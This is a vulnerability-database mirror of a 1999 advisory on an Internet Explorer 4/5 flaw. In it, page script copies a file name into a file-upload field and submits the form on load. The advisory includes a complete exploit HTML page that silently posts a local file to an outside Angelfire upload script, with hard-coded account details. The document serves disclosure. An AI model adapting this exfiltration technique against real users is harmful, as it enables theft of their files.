Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

cuartango-msie.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 19 Views

Security hole in Microsoft Internet Explorer allows file transfer to malicious sites via scripting.

Show more
Code
`Cuartango security Hole   
  
http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html  
  
Affected software  
Microsoft Internet Explorer 4  
Microsoft Internet Explorer 5 Preview  
  
Risks  
Major : Your computer files can be sent to a WEB site by a malicious Script (if the file name is known).  
  
Technical description  
There is an input form field used to tranfer files from the browsing computer to a WEB site this  
input field is HTML coded as :  
  
<input type="file" name="filename" size="30">  
  
Theoretically this input field can be filled only by the user by clicking a "Browse" button or  
typing the file name.  
In order to avoid a security hole, script files are not allowed to modify the value of this input   
field, the sentence bellow will not work (very clever MS Explorer programmers) :  
  
document.forms[0].filename = "C:\config.sys";  
  
What Microsoft programmers forgot is that "copy" and "paste" commands are possible in scripting with  
Internet Explorer 4 and they did not protect the file input field against this operation.  
Tha attack is the evident :  
1- Create a second form with a hidden field named "T1" containing the file name you want to hack.  
2- In the HTML Body Onload event fire an script :  
  
<body onload="getfile()">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
document.forms[0].submit();  
}  
  
The result is that the file is POSTED to the malicious WEB site defined in the form action property.  
  
  
----------exploit code example----------  
  
<html>  
<script language="JavaScript">  
  
function getfile()  
{  
document.forms[1].T1.select();  
document.execCommand("copy");  
document.forms[0].filename.select();  
document.execCommand("paste");  
window.open("cuartangoh3.html");  
document.forms[0].submit();  
}  
  
</script>  
  
  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">  
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">  
<title>Cuartango Hole 2</title>  
</head>  
  
<body onload="getfile()">  
  
<form enctype="multipart/form-data" method="post"  
action="http://www.angelfire.com/cgi-bin/bedit">  
<input type="hidden" name="storage" value="ab"><input type="hidden" name="hpd"  
value="cuartangojc"><input type="hidden" name="password" value="asisea"><p><strong>I am  
transfering your file</strong> <input type="file" name="filename" size="30"> <strong>to my  
web site </strong>&nbsp; </p>  
</form>  
  
<form method="POST">  
<input type="hidden" name="T1" value="/test.txt"><p>&nbsp;</p>  
</form>  
  
</body>  
</html>  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
cuartango security holemicrosoft internet explorerfile transfer vulnerabilitymalicious script exploitinput field attack
19
.json
Report